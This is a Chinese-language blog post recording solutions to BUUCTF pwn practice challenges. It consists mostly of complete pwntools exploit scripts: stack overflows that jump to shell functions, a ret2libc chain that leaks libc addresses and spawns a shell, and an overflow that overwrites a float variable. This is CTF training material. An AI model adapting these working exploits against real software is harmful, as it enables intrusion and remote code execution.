lockcy's cave
0%

buuctf pwn做题记录(ing)

发表于 更新于
本文字数: 2.8k 阅读时长 ≈ 3 分钟

a pwn a day keeps sadness away

rip
最简单的栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context(arch = 'amd64', os = 'linux')
DEBUG=1
if DEBUG==1:
	s=process('./pwn1')
	s.recvuntil('\n')
else:
	s=remote('pwn.buuoj.cn',6001)

system_addr=0x0000000000401186
payload=0xF*'a'+8*'a'+p64(system_addr)
s.sendline(payload)
s.interactive()

warmup_csaw_2016
最简单的栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context(arch='amd64',os='linux')
DEBUG=1
if DEBUG==0:
        s=remote('pwn.buuoj.cn',20035)
else:
        s=process('./warmup_csaw_2016')

getshell=0x000000000040060D
payload=0x40*'a'+8*'a'+p64(getshell)
s.recvuntil('>')
s.sendline(payload)
s.interactive()

ciscn_2019_c_1
ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
context(arch = 'amd64', os = 'linux')
DEBUG=0
if DEBUG==1:
        s=process('./ciscn_2019_c_1')
else:
        s=remote('pwn.buuoj.cn',20115)

elf=ELF('ciscn_2019_c_1')
libc=ELF('x64_libc.so.6')

puts_offset=libc.symbols['puts']
system_offset=libc.symbols['system']
bin_offset=0x000000000018CD57

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

main=elf.symbols['main']
vul_addr=0x00000000004009A0

payload=0x50*'a'+8*'a'

rdi_addr=0x000000000000400c83
rsi_addr=0x000000000000400c81

payload1=payload+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(vul_addr)

s.recvuntil('!\n')
s.sendline('1')
s.recvuntil('\n')

s.sendline(payload1)

s.recvuntil('@\n')
puts_addr=u64(s.recv(6).ljust(8,'\x00'))
print p64(puts_addr)

system_addr =puts_addr - puts_offset + system_offset
bin_addr = puts_addr - puts_offset + bin_offset

payload2 = payload+p64(rdi_addr)+p64(bin_addr)+p64(system_addr)
s.sendline(payload2)
s.interactive()

pwn1_sctf_2016
最简单的栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
context(arch='i386',os='linux')

DEBUG=0
if DEBUG==0:
        s=remote('pwn.buuoj.cn',20086)
else:
        s=process('./pwn1_sctf_2016')

getshell=0x08048F0D
payload=0x14*'I'+4*'a'+p32(getshell)
#s.recvuntil(': ')
s.send(payload)
s.interactive()

ciscn_2019_n_1
1.栈溢出至函数参数
2.浮点数在内存中的存储方式(ieee 754)

1
2
3
4
5
6
7
from pwn import *
#s=process('./ciscn_2019_n_1')
s=remote('node2.buuoj.cn.wetolink.com',28332)
s.recvuntil('\n')
payload=44*'a'+'\x00'+'\x80'+'\x34'+'\x41'
s.sendline(payload)
print s.recv()

ciscn_2019_en_2
我做的时候和ciscn_2019_c_1 一样,不知道比赛的时候是什么题